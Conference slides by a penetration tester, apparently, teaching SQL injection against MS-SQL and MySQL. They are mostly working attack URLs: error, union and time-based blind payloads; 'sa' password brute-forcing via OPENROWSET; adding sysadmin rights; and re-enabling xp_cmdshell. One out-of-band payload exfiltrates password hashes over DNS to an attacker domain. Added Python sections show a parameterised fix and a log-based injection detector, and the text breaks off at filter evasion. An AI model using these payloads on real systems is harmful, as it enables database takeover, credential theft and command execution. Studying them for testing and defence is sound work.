The Last of a Dying Breed

A Network Penetration Tester 

You know - the nmap, exploit, upload netcat type of guy. 



A.K.A: 

The black guy at security conferences 
Step 1: Tell customer you are 31337 security professional
Customers only applied patches if it fixed something on the system 

It was common practice NOT to apply system updates that didn't fix a problem you were 
experiencing on a system (WTF ARE YOU DOING - YOU MIGHT BREAK SOMETHING!!!!!) 

Step 2: Scan customer network with ISS or Nessus if you were a renegade 
Customers didn't apply patches, and rarely even had firewalls and IDSs back then 

You know you only ran ISS because it had nice reports... 

Step 3: Break out your uber 31337 warez and Own it all!!!!! 

You only kept an exploit archive to save time (Hack.co.za was all you needed back then) 

If you could read the screen you could Own the network!!!!!!! 
Hacking Way Back In The Day

[Screenshot: nmap -sS -O -p 1-1024 -v 192.168.1.20 reporting 135/tcp (loc-srv) and 139/tcp (netbios-ssn) open, "TCP Sequence Prediction: Class=trivial time dependency, Difficulty=0 (Trivial joke)" and "Remote operating system guess: Windows NT / Win95 / Win98"; 1 host up, scanned in 4 seconds]

[Screenshot: telnet 192.168.0.111 21 returning the banner "220 2kserver Microsoft FTP Service (Version 5.0)", then telnet 192.168.0.111 80 returning "HTTP/1.1 400 Bad Request" with "Server: Microsoft-IIS/5.0" and "The parameter is incorrect."]
[Screenshot: Netscape on "Welcome to Rootshell", showing the rootshell archive for 199902 (exploits dated 2/8/99 and 2/9/99: ACC's Tigris Access Terminal server security vulnerability; hp5crash.txt, another way to crash HP 5m printers with firmware dated before 19960829; icmpquery.c, send and receive ICMP queries for address mask and current time; ffcore.txt, ff.core exploit for Solaris 2.5.1 and 2.6; sendmail892against.txt, denial of service attack in Sendmail 8.9.2 with exploit; ftpd.txt, remote buffer overflows in various FTP servers leading to potential root compromise)]

[Screenshot: packetstormsecurity.org front page from late June 2006 with news items (Apple Plugs Five Security Holes; Controversy Erupts Over US Cyber Security Czar; White House Orders Better Security For Sensitive Data; AT&T Unit Settles Government Fraud Charges; Gnash, The Free Flash Player, Makes Progress), new tools (aircrack-ng-0.6, strongswan-2.7.2, mimedefang-2.57, yersinia-0.7) and the latest advisories list]
[Screenshot: Windows command prompts running execiis.exe (the "Microsoft IIS CGI Filename Decode Error" exploit) and fp30reg.exe (the FrontPage fp30reg.dll overflow exploit) against 192.168.0.107, ending in a Windows 2000 cmd.exe prompt where whoami returns NT AUTHORITY\SYSTEM]

[Screenshot: Ethereal capture filtered on 192.168.235.1 and 192.168.235.128 showing the TCP three-way handshake of a telnet session, and its "Follow TCP Stream" view of a Red Hat 6.2 login (ls, cd, and the bash "command not found" echo of doubled keystrokes)]
[Screenshot: "31337 Penetration Test.odt" open in OpenOffice.org Writer]

31337 Security Dudes

Penetration Test Report

Your Network Sux!!!
All your boxes are belong to us!!!!!
What Did It For Me

...I used to think Web App Security was stupid sh*t

"...This stuff isn't hacking"

...but then I saw a demo of a tool called sqlninja upload nc.exe to a host vulnerable to
SQL injection

I was hooked!!!!!!!!!!!!!!!!!!!!
Geez... That's A Lot To Bypass

More Security Measures are being implemented on company networks today

Firewalls are common place (perimeter and host-based)

Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer overflows)

Intrusion Detection/Prevention Systems are hard to detect let alone bypass 

NAC Solutions are making their way into networks 

Network/System Administrators are much more security conscious 

IT Hardware/Software vendors are integrating security into their SDLC 
Agenda

Getting started 
Background 
Basic Attack Methods 

SQL Injection In The Real World 
Ugh...WTF???? 

Filter & IDS Evasion 

Javascript Validation 
Serverside Filters 
IDS Signatures 
WAF Evasion 
Assumptions...



I submitted a talk entitled "SQL Injection for Mere Mortals" and it didn't get 
accepted. Sorry - I am not covering the basics.... 

I am NOT going to teach you the basics of SQL 

I am NOT going to teach you the basics of SQL Injection 

Buy me rum and coke, and I'll teach you anything I know 
3 Classes of SQLI



SQL Injection can be broken up into 3 classes 

Inband - data is extracted using the same channel that is used to inject the SQL code. 
This is the most straightforward kind of attack, in which the retrieved data is presented 
directly in the application web page 

Out-of-Band - data is retrieved using a different channel (e.g.: an email with the results of 
the query is generated and sent to the tester) 

Inferential - there is no actual transfer of data, but the tester is able to reconstruct the 
information by sending particular requests and observing the resulting behaviour of the 
website/DB Server. 
Inband:



Data is extracted using the same channel that is used to inject the SQL 
code. 

This is the most straightforward kind of attack, in which the retrieved data is 
presented directly in the application web page 

So this is our Error-Based, and Union-Based SQL Injections 

http://[site]/page.asp?id=1 or 1=convert(int,(USER))-- 

Syntax error converting the nvarchar value '[jOe]' to a column of data type int. 
Out-of-band:

Data is retrieved using a different channel (e.g.: an email with the results of
the query is generated and sent to the tester).

This is another way of getting the data out of the server (such as http, or dns).

http://[site]/page.asp?id=1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.pwn3dbyj0e.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--




Learn Security Online 



Inferential: 



If the application returns an error message generated by an incorrect query, 
then it is easy to reconstruct the logic of the original query and therefore 
understand how to perform the injection correctly. 

However, if the application hides the error details, then the tester must be 
able to reverse engineer the logic of the original query. 

The latter case is known as "Blind SQL Injection". 

http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:10'--
Ask it if it's running as 'sa'
What About Tools????

Automated tools are a great way to identify SQLI.

Yeah, they are, just be conscious of the different SQL Injection types.
SQL Vuln Scanners

So let's start with some tools you can use to identify SQLI as well as
the type they generally identify.

mieliekoek.pl (error based)
wpoison (error based)
sqlmap (blind by default, and union if you specify)
wapiti (error based)
w3af (error, blind)
paros (error, blind)
sqid (error)

Joe, I am sick of this sh*t, what the heck do you mean by error based, blind and union?
SQL Injection Types

Error-Based SQL Injection
Union-Based SQL Injection
Blind SQL Injection

Error:
Asking the DB a question that will cause an error, and gleaning information from the
error.

Union:
The SQL UNION is used to combine the results of two or more SELECT SQL
statements into a single result. Really useful for SQL Injection :)

Blind:
Asking the DB a true/false question and using whether a valid page was returned or not, or
the time it took for your valid page to return, as the answer to the question.
My Methodology

How I test for SQL Injection

Identify

* Identify The Injection (Tool or Manual)

* Determine Injection Type (Integer or String)

Attack

* Error-Based SQL Injection (Easiest)

* Union-Based SQL Injection (Great for data extraction)

* Blind SQL Injection (Worst case....last resort)
Why Focus On Manual Testing

Now that you understand that there are 3 primary types of SQL Injection.... 

- Can you understand why being able to test for SQLI manually is important? 

- SQL Injection Scanners will generally look for 1 type of injection 

- The scanner may tell you the site isn't vulnerable when it really is. 
Determine the Injection Type

Is it integer or string based?

Integer Injection:
http://[site]/page.asp?id=1 having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

String Injection:
http://[site]/page.asp?id=x' having 1=1--

Column '[COLUMN NAME]' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.

Determining this is what determines if you need a ' or not.
Let's start with MS-SQL syntax



I would say that MS-SQL Injection is probably the most fun ;) 

There is always the possibility of getting access to a stored procedure 

like xp_cmdshell 

muahahahahahahahahahaha 



We'll spend a little bit of time on MySQL, and not too much time on Oracle as 
its injection syntax is fairly similar to MS-SQL. But primarily for the sake of time 
we'll focus on MS-SQL. 
Error-Based SQL Injection Syntax for extracting the USER

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.

Grab the database user with USER
Grab the database name with DB_NAME
Grab the servername with @@servername
Grab the Windows/OS version with @@version
Union-Based SQL Injection Syntax for extracting the USER

http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an equal number of
expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR

http://[site]/page.asp?id=null UNION SELECT ALL 1,USER,3,4--
Blind SQL Injection Syntax for extracting the USER

3 - Total Characters

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
ASCII Table (Dec / Hex / Char)

Dec Hex Char                Dec Hex Char   Dec Hex Char   Dec Hex Char
0   00  Null                32  20  Space  64  40  @      96  60  `
1   01  Start of heading    33  21  !      65  41  A      97  61  a
2   02  Start of text       34  22  "      66  42  B      98  62  b
3   03  End of text         35  23  #      67  43  C      99  63  c
4   04  End of transmit     36  24  $      68  44  D      100 64  d
5   05  Enquiry             37  25  %      69  45  E      101 65  e
6   06  Acknowledge         38  26  &      70  46  F      102 66  f
7   07  Audible bell        39  27  '      71  47  G      103 67  g
8   08  Backspace           40  28  (      72  48  H      104 68  h
9   09  Horizontal tab      41  29  )      73  49  I      105 69  i
10  0A  Line feed           42  2A  *      74  4A  J      106 6A  j
11  0B  Vertical tab        43  2B  +      75  4B  K      107 6B  k
12  0C  Form feed           44  2C  ,      76  4C  L      108 6C  l
13  0D  Carriage return     45  2D  -      77  4D  M      109 6D  m
14  0E  Shift out           46  2E  .      78  4E  N      110 6E  n
15  0F  Shift in            47  2F  /      79  4F  O      111 6F  o
16  10  Data link escape    48  30  0      80  50  P      112 70  p
17  11  Device control 1    49  31  1      81  51  Q      113 71  q
18  12  Device control 2    50  32  2      82  52  R      114 72  r
19  13  Device control 3    51  33  3      83  53  S      115 73  s
20  14  Device control 4    52  34  4      84  54  T      116 74  t
21  15  Neg. acknowledge    53  35  5      85  55  U      117 75  u
22  16  Synchronous idle    54  36  6      86  56  V      118 76  v
23  17  End trans. block    55  37  7      87  57  W      119 77  w
24  18  Cancel              56  38  8      88  58  X      120 78  x
25  19  End of medium       57  39  9      89  59  Y      121 79  y
26  1A  Substitution        58  3A  :      90  5A  Z      122 7A  z
27  1B  Escape              59  3B  ;      91  5B  [      123 7B  {
28  1C  File separator      60  3C  <      92  5C  \      124 7C  |
29  1D  Group separator     61  3D  =      93  5D  ]      125 7D  }
30  1E  Record separator    62  3E  >      94  5E  ^      126 7E  ~
31  1F  Unit separator      63  3F  ?      95  5F  _      127 7F  Delete
Blind SQL Injection Syntax for extracting the USER

D - 1st Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay
Blind SQL Injection Syntax for extracting the USER

B - 2nd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
Valid page returns after 10 second delay
Blind SQL Injection Syntax for extracting the USER

O - 3rd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>98) WAITFOR DELAY '00:00:10'--
Valid page returns immediately

and so on

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--
Valid page returns after 10 second delay

Database User = DBO
Let's move on to MySQL syntax



With MySQL you really only have: 



* Union-Based 

* Blind 
MySQL

With MySQL you will typically use union or true/false blind SQL Injection so 
you really need to know a lot about the DB you are attacking such as: 

* number of columns 

* column names 

* path to website 

So you will need to enumerate this information first. 

The UNION operator is used to combine the result-set of two or more SELECT 
statements. Notice that each SELECT statement within the UNION must have 
the same number of columns. The columns must also have similar data types. 
Also, the columns in each SELECT statement must be in the same order. 
Column number enumeration

http://[site]/page.php?id=1 order by 10/* <-- gives Unknown column '10' 
in 'order clause' 

http://[site]/page.php?id=1 order by 5/* <-- gives a valid page 

http://[site]/page.php?id=1 order by 6/* <-- gives Unknown column '6' in 
'order clause' 

So now we know there are 5 columns. 

By the way you can do this with MSSQL as well. 
Building the union



http://[site]/page.php?id=1 union all select 1,2,3,4,5/* <-- gives a valid page 

Change the first part of the query to a null or negative value so we can see 
what field will echo data back to us. 

http://[site]/page.php?id=-1 union all select 1,2,3,4,5/* <-- gives a valid page but 
with the number 2, and 3 on it 

or 
http://[site]/page.php?id=null union all select 1,2,3,4,5/* <-- gives a valid page 
but with the number 2, and 3 on it 

Now we know that column numbers 2 and 3 will echo data back to us. 
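To make the integer-versus-string distinction and the ORDER BY column-count probe concrete, here is an added example that is not from the slides: a Python sqlite3 stand-in for page.php with the lookup written both ways the slides exploit, and once parameterised so the same requests leak nothing. The products table, its rows and the function names are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the slides' page.php backend: a five-column table,
# matching the column count the ORDER BY walk-through arrives at.
ROWS = [
    (1, "Widget", "Blue widget", 9.99, 3),
    (2, "Gadget", "Red gadget", 19.99, 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products "
        "(id INTEGER, name TEXT, descr TEXT, price REAL, stock INTEGER)"
    )
    conn.executemany("INSERT INTO products VALUES (?,?,?,?,?)", ROWS)
    return conn


def lookup_integer_concat(conn, value):
    # Integer injection context: the request value lands in the SQL unquoted,
    # so a payload needs no leading quote (the slides' "id=1 having 1=1--" case).
    return conn.execute("SELECT * FROM products WHERE id = " + value).fetchall()


def lookup_string_concat(conn, value):
    # String injection context: the value sits inside quotes, so a payload has
    # to start with ' to break out (the slides' "id=x' having 1=1--" case).
    return conn.execute(
        "SELECT * FROM products WHERE name = '" + value + "'"
    ).fetchall()


def lookup_parameterised(conn, value):
    # Hardened lookup: the whole request value is bound as one literal, so
    # ORDER BY / UNION text never becomes part of the statement.
    return conn.execute(
        "SELECT * FROM products WHERE id = ?", (value,)
    ).fetchall()


def probe(conn, lookup, value):
    """Run one request and report ('ok', rows) or ('error', message).

    This is the only signal the slides rely on: valid page versus error page.
    """
    try:
        return ("ok", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def order_by_signal(conn, lookup, max_cols=10):
    """Replay the slides' column-count probe: 'order by N' until the DB errors.

    Returns the column count the error leaks, or None when every probe comes
    back 'ok' (nothing leaks, which is what the parameterised lookup gives).
    """
    for n in range(1, max_cols + 1):
        status, _ = probe(conn, lookup, "1 order by %d" % n)
        if status == "error":
            return n - 1
    return None


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("integer concat", lookup_integer_concat),
                      ("string concat", lookup_string_concat),
                      ("parameterised", lookup_parameterised)):
        print(label, "-> column count leaked:", order_by_signal(db, fn))
        print(label, "-> union marker row:",
              probe(db, fn, "null union all select 1,2,3,4,5"))
```

Note that an unquoted payload against the string-context lookup silently returns no rows, which is exactly why the slides make you settle integer versus string before anything else.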
Building the union

http://[site]/page.php?id=null union all select 1,2,3,4,5,6,7/*

[Screenshot: the page renders "Request A Demo" with the marker 6 displayed where a field would be]

http://[site]/page.php?id=null union all select 1,2,user(),4,5,@@version,7/*

[Screenshot: the same page now shows the database user (a user@localhost value) and @@version in place of the markers]
Information Gathering

http://[site]/page.php?id=null union all select 1,user(), 3,4,5/* 
http://[site]/page.php?id=null union all select 1,2,database(),4,5/* 
http://[site]/page.php?id=null union all select 1,@@version,@@datadir,4,5/* 

Grab the database user with user() 
Grab the database name with database() 
Grab the database version with @@version 
Grab the database data directory with @@datadir 
Basic SQLI Attack Methods

Error-Based SQL Injection

http://[site]/page.asp?id=2 or 1 in (select @@version)--
Obtaining the version of the OS

http://[site]/page.asp?id=2 or 1 in (select @@servername)--
Obtaining the hostname of the server

http://[site]/page.asp?id=2 or 1 in (select user)--
Obtaining the user

http://[site]/page.asp?id=2 or 1 in (select db_name(N))--
Obtaining the database name(s). N = start with and keep incrementing
Basic SQLI Attack Methods

Union-Based SQL Injection

http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number
of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--
http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR

You should receive the error with each request, errors not shown to make room for the
slide
Basic SQLI Attack Methods

Union-Based SQL Injection Cont. (1)

http://[site]/page.asp?id=-1 UNION SELECT ALL 1,2,3,4--

http://[site]/page.asp?id=null UNION SELECT ALL 1,2,3,4--

Look for 1 or even a few numbers to display on the page

These numbers that are displayed on the page are the column numbers you can use for
extracting data. Let's say that we see columns 2, and 3 displayed on the screen.

http://[site]/page.asp?id=-1 UNION SELECT ALL 1,user(),3,4--

http://[site]/page.asp?id=null UNION SELECT ALL 1,2,@@version,4--
Basic SQLI Attack Methods

True-False Blind SQL Injection

http://www.site.com/page.php?id=66 AND 1=1-- Valid Page

http://www.site.com/page.php?id=66 AND 1=2-- Error Page

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 51    (51 = '3')
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 53    (53 = '5')
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 1, 1)) > 52    (52 = '4')

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 43    (43 = '+')
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 45    (45 = '-')
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 2, 1)) > 46    (46 = '.')

http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 51    (51 = '3')
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 49    (49 = '1')
http://www.site.com/page.php?id=66 AND ORD(MID((VERSION()), 3, 1)) > 48    (48 = '0')

MID() extracts characters from a text field; ORD() gives the ASCII value of the character (see the ASCII table).

retrieved version: 5.0.45
Basic SQLI Attack Methods

Time-Based Blind SQL Injection

http://[site]/page.asp?id=1;waitfor+delay+'0:0:5';--

See if it takes 5 seconds to return the page. If it does, then you can ask it questions.

http://[site]/page.asp?id=1;if+not(substring((select+@@version),%,1)+<>+5)+waitfor
+delay+'0:0:5';--

Ask it if it is running SQL Server 2000

http://[site]/page.asp?id=1;if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--
Ask it if it's running as "sa"

http://[site]/page.asp?id=1;if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--
Ask it if the current user is a member of the sysadmin group
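Every class the slides walk through (error-based, union-based with its ORDER BY column count, true/false and time-based blind, out-of-band, and the OPENROWSET / xp_cmdshell calls the deck comes back to under Privilege Escalation) leaves its keywords in the web server's access log once the request is URL-decoded. What follows is an added example, not from the slides: a Python classifier that runs the slides' own payload vocabulary over constructed log lines. The common-log-format layout, the signature names and the sample lines are assumptions made for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the request strings in the slides;
# not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2008:10:01:02] "GET /page.asp?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/May/2008:10:01:09] "GET /page.asp?id=1%20or%201=convert(int,(USER))-- HTTP/1.1" 500 311
10.0.0.5 - - [01/May/2008:10:01:15] "GET /page.asp?id=null%20UNION%20SELECT%20ALL%201,USER,3,4-- HTTP/1.1" 200 640
10.0.0.5 - - [01/May/2008:10:01:21] "GET /page.php?id=66%20AND%20ORD(MID((VERSION()),1,1))%3E51-- HTTP/1.1" 200 512
10.0.0.5 - - [01/May/2008:10:01:44] "GET /page.asp?id=1;IF%20(LEN(USER)=3)%20WAITFOR%20DELAY%20'00:00:10'-- HTTP/1.1" 200 512
10.0.0.5 - - [01/May/2008:10:02:01] "GET /page.php?id=1%20order%20by%206/* HTTP/1.1" 500 220
10.0.0.5 - - [01/May/2008:10:02:30] "GET /page.asp?id=1;select%20*%20from%20OPENROWSET('SQLOLEDB','';'sa';'JOE','select%201') HTTP/1.1" 500 300
"""

# Common-log-format line: client, identity, user, [time], "request", status, bytes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+)')

# One signature per class the slides describe, applied to the decoded query
# string. The keywords are the ones used in the slides' own payloads.
SIGNATURES = [
    ("error-based", re.compile(
        r"\bconvert\s*\(\s*int\b|\bor\s+1\s+in\s*\(\s*select\b", re.I)),
    ("union-based", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("column-enumeration", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("boolean-blind", re.compile(
        r"\band\s+\d+\s*=\s*\d+|\bord\s*\(\s*mid\s*\(", re.I)),
    ("time-based-blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("out-of-band", re.compile(r"\bxp_fileexist\b|\bfn_varbintohexstr\b", re.I)),
    ("privilege-escalation", re.compile(
        r"\bopenrowset\s*\(|\bxp_cmdshell\b|\bsp_oacreate\b|\bsp_addsrvrolemember\b",
        re.I)),
]


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, when, method, path, status, size = m.groups()
    return {"ip": ip, "time": when, "method": method, "path": path,
            "status": status, "bytes": int(size)}


def decode_query(path):
    """Return the URL-decoded query string ('' if the path has none).

    Decoding first matters: the slides' payloads arrive as %20, %3E and '+'.
    """
    if "?" not in path:
        return ""
    return unquote_plus(path.split("?", 1)[1])


def classify(query):
    """Return the injection classes whose signature matches the decoded query."""
    return [name for name, rx in SIGNATURES if rx.search(query)]


def scan_log(text):
    """Return one finding per log line that matches at least one signature.

    The HTTP status is kept alongside the tags: error-based probes usually
    pair with a 500, while blind probes come back 200 and are only visible
    through the query string itself.
    """
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(decode_query(rec["path"]))
        if tags:
            rec["tags"] = tags
            findings.append(rec)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], ",".join(f["tags"]), f["path"])
```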
SQL Injection In the Real World

In the real world exploiting SQL Injection can be difficult. More and more complex 
dynamic queries are being passed to backend DBs. Also, more and more people know 
not to run a database as 'sa', and they know to remove the xp_ stored procedures. 

It's time to up your game. 

* Ugh...wtf 

* Privilege Escalation 

* Re-Enabling stored procedures 

* Obtaining an interactive command-shell 
SQL Injection In the Real World

You know I always trip out on the fact that Lil Jon is a millionaire and only has a
vocabulary of "YEAAAHHHHH", and "WUUUUHAAAATTTT".

Here I am hacking into companies and I'm not even close. What am I doing wrong?
Maybe I should trade in the shirt, tie, slacks, laptop for a mouth full of gold teeth,
dreadlocks, baggy pants, 40 oz, and a phat blunt!!!!!

meh...nah...I love hacking too much...YEAAAAAAHHHHH
UGGGGHHH WTF??? (1)

http://www.liljon.com/liljon.asp?lil='

Gives the error:

Microsoft OLE DB Provider for SQL Server error '80040e14'

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER))--
Gives the error:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near ')'.

Hmm....ok, so it doesn't like that right paren so let's add one more to the end of our query.

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(USER)))--

Gives the error:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'liljon' to data type int.

Now we know every injection from here on out will require the additional right paren....
@@servername()), @@version()), db_name()), etc....
UGGGGHHH WTF??? (1) Cont.

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(DB_NAME())))--

Gives the error:

Conversion failed when converting the nvarchar value 'yeaaaaaah' to data type int.

http://www.liljon.com/liljon.asp?lil=71%20or%201=convert(int,(@@VERSION)))--

Gives the error:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23
2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790:
Service Pack 2) ' to data type int.

The database has been enumerated...WUUUUHAATTTTT

The database has been enumerated...WUUUUHAATTTTT

The database has been enumerated...WUUUUHAATTTTT

The database has been enumerated...YEEAAAAAAAHHHHHHHHHHHH!!!!!!!!!!!!!!!!!!!!!!!!!!

Liljohn - Shut the f*ck up....OOKAYYY!!!!!!!!!!!!!!!!
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UGGGGHHH WTF??? (2) 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201-- 
http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2-- 

Received error: The text, ntext, or image data type cannot be selected as DISTINCT. 

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO')--

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4--

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5--

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6--

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7--

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8--

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8,9--

Received error: Operand type clash: text is incompatible with int

http://www.site.com/page.php?id=5%20UNION%20ALL%20SELECT%201,2,convert(text,'HELLO'),4,5,6,7,8,null--

Tips:

1. Always use UNION with ALL because of image and similar non-distinct field types. By default UNION tries to return only distinct records.

2. Use NULL in UNION injections for most data types instead of trying to guess string, date, integer.
Privilege Escalation

Step 1 : Brute-Force the 'sa' password 

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'JOE','waitfor delay "0:0:50";select 1;');&a=1

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'joe','waitfor delay "0:0:50";select 1;');&a=1

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','waitfor delay "0:0:50";select 1;');&a=1

Key point to remember is that we used time-based blind sqli to enumerate the sa account 
password length. This is a great aid in bruteforcing. 
Privilege Escalation

Step 2: Add current user to admin group 

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','exec master..sp_addsrvrolemember "sa","sysadmin";select 1');&a=1

Privilege Escalation

Step 3: Recreate the xp_cmdshell stored procedure 

MSSQL Server 2000 

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select 1;exec master..sp_dropextendedproc "xp_cmdshell";')&a=1

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select 1;DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int EXECUTE @OLEResult=sp_OACreate "WScript.Shell",@ShellID OUT IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR("CreateObject %0X",14,1,@OLEResult) EXECUTE @OLEResult=sp_OAMethod @ShellID,"Run",Null,"ping -n 8 127.0.0.1",0,1 IF @OLEResult<>0 SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR("Run %0X",14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID');&a=1

Remember to correctly identify the backend version at this step, because MS SQL 2000 handles this differently than MS SQL 2005.
Privilege Escalation

Step 3: Recreate the xp_cmdshell stored procedure (What's really going on?) 

select * from OPENROWSET('SQLOLEDB','';'sa';'j0e','select 1;

DECLARE @result int,@OLEResult int,@RunResult int,@ShellID int

EXECUTE @OLEResult=sp_OACreate "WScript.Shell",@ShellID OUT IF @OLEResult<>0

SELECT @result=@OLEResult IF @OLEResult<>0 RAISERROR("CreateObject %0X",14,1,@OLEResult)

EXECUTE @OLEResult=sp_OAMethod @ShellID,"Run",Null,"ping -n 8 127.0.0.1",0,1 IF @OLEResult<>0

SELECT @result=@OLEResult IF @OLEResult<>0

RAISERROR("Run %0X",14,1,@OLEResult) EXECUTE @OLEResult=sp_OADestroy @ShellID');&a=1
Privilege Escalation

Step 3: Recreate the xp_cmdshell stored procedure 

MSSQL Server 2005 (re-enabling xp_cmdshell) 

http://[site]/page.asp?id=1;select * from OPENROWSET('SQLOLEDB',";'sa';'j0e','select 
1;exec master..sp_configure "show advanced options", 1;reconfigure;exec 
master.. sp_configure "xp_cmdshell",1 ;reconfigure')&a=1 



http://[site]/page.asp?id=1;exec master.. sp_configure 'show advanced options', 
1;reconfigure;exec master..sp_configure 'ole automation procedures',1;reconfigure;&a=1 
Not Getting Caught

Filter Evasion

I know that people often think this stuff is very black and white, cut and dry - but the 
simple truth with sql injection is sometimes you just have a gut feeling that you are 
looking at a vulnerable page. 

You've tried a bunch of things but for some reason nothing seems to be working. You 
may be facing some sort of filtering. Maybe the developer has attempted to stop sql 
injection by only allowing alphanumeric characters as input. 
Client-Side Filtering

The first thing that we want to do is determine if the filtering is client-side (ex: being 
done with javascript). 

View source code and look for any parameters being passed to the website that 
